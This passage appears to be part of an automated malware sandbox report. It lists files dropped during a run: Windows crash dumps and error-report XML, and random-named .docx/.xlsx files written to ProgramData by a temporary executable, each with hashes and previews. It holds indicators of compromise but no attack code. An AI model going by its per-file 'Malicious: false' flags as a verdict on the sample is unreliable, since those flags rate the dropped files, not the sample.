MD5:	AE0714415E3FF5F07CAAA24EB452FD8D
SHA1:	FA16F1A516DBE320C59D1FAE743EC26A42CB87C2
SHA-256:	7723A597373310B946C497A2EF5FCDA14BBA57589B0AE6A7FED772652446241D
SHA-512:	4E27296FC5A89C0C14D6159AEC9111B85D50F0FEE3D683E88EA4EF80F09ACDDB71C44BFB75C95BD33E569730A87021212BDAC04B7BFD5F6099C8240B7684E1CB
Malicious:	false
Preview:	MDMP..a..... .......i.f............4...........H...H.......d....#..........D?..........`.......8...........T...........0:...z...........(.........................................................................................eJ......x+......GenuineIntel............T...........W.*f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER96B9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.698039139042853
Encrypted:	false
SSDEEP:	192:R6l7wVeJCK626Y95SUatgmf244RpD/89bvasf/lm:R6lXJX626YDSUatgmf244kv5fg
MD5:	40BA410B133C7BB897CD7D41FE85D31F
SHA1:	83CE12060A99D62A80DBF48BC3C41FFF00A9318E
SHA-256:	010AF2D7AF6553FB7E0C57ECE33D5750AC8B6948E325368B5BE8A9648B8F54B0
SHA-512:	36A581C3D844CA8FB03B1D4D31355DD9FEAF21139C58F0DADB79A85A6E6E38227993EB92DEF1E3395E039049B82E9A13CBECB2D96778F3B3CB40A4FF80AFB1A2
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.8.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER96E9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4595
Entropy (8bit):	4.478570057261215
Encrypted:	false
SSDEEP:	48:cvIwWl8zsIJg77aI9b4WpW8VYEYm8M4Jm/F++q8GS9c9d:uIjfOI7tx7VcJvC9c9d
MD5:	A6D67EFB4B1CF84107AC454E63617403
SHA1:	7D0EC294CD783E7B191810BF30DCE308B34B79A3
SHA-256:	73044EC8852EB25CA291E7DEAEFFD439567BC775CB37416042E4753BFCC902D3
SHA-512:	F9BFED1737E15F2D761FCC75FF0DD8422F8D08149DEE71DF1573F9EF673334825FAC32718392B0B035D8596199234963A2AA8019CF81888560BE3421D4672AAF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAE1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Apr 25 07:04:35 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	57218
Entropy (8bit):	2.5589419762501002
Encrypted:	false
SSDEEP:	192:BV0XDXUGejrYXfFaXIgraOQOJwN2zbeBnZVk+fAo7mFp9UawvPoS5E//ofUnGgD9:/NGeKF3+QEcnZVrONCHfSG6yEEUGnPt
MD5:	17D55C71027AA424617E7B498FF086DE
SHA1:	6DA1B544398ABDA710513F3CBA79C2DD52739414
SHA-256:	99F58098D10BE229CEB6F74C2E75FE071FB0ED1CBC99815C6BB50E7CC6E37C29
SHA-512:	EEB75FCA18994791E0934C01412B01F740760F3AF6015AA4DEE6C1D96FC92A251D0EC209EE3060D2E664B3A8C96C5C41A2EFD08E91AA2F50B82819189D00A32B
Malicious:	false
Preview:	MDMP..a..... .........f............4............ ..<...........v9..........T.......8...........T...........P[..2...........((.........................................................................................eJ.............GenuineIntel............T...........^.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCC6.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6420
Entropy (8bit):	3.718853295297442
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbX96spxY0ZQbAlABLh5QgaMQU089bAYRasfoagm:R6l7wVeJX96EY1bAgpD089bApsfoagm
MD5:	0A0C326D071EDAA2A85839D8886898F9
SHA1:	32831FA23FEF0E68A4FB87D81062F308540C6A23
SHA-256:	664548D0B195A3BB42D46FD9FE36C5D6EAB31F1B01D0BF509CF8811AB203D78C
SHA-512:	F97582763B238E34DFE673CD10CB2C40834A3FF127B580314E448B4B5E2AC07A93FADE02D294F723CC2DDC545B68C80099E097A3746717737C0EEEE746912C79
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCF6.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.462367415373103
Encrypted:	false
SSDEEP:	48:cvIwWl8zs3Jg77aI9b4WpW8VYW85Ym8M4JbvhmRO3FmPu+q8vChmROjSEBumzVz1:uIjfZI7tx7VCoJEjPuKnVEYwdfd
MD5:	C704232274FB1868E8A7DB51265C7E1A
SHA1:	C84CD821432B13596F0F872943EB60B609A267FB
SHA-256:	E4FF1AA15FACD24CACDBD2310DEACF430F882956EBDB89D8E2406C46C94B63F5
SHA-512:	B4E6507F39AE52A72BD42CC542AD41F760FAA221EE2F98F632D65243FFAF197C3A86A88C2D91000246169686CA8D969E990E444CB1C04D3942B6177C0E4B3D28
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295087" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\RAYHIWGKDI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69782189124949
Encrypted:	false
SSDEEP:	24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:	0640503E533EFB11CC70F43D2FFF4E26
SHA1:	EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:	F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:	10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:	false
Preview:	RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

C:\ProgramData\RAYHIWGKDI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69782189124949
Encrypted:	false
SSDEEP:	24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:	0640503E533EFB11CC70F43D2FFF4E26
SHA1:	EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:	F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:	10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:	false
Preview:	RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

C:\ProgramData\SFPUSAFIOL.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\SUAVTZKNFL.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\ProgramData\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
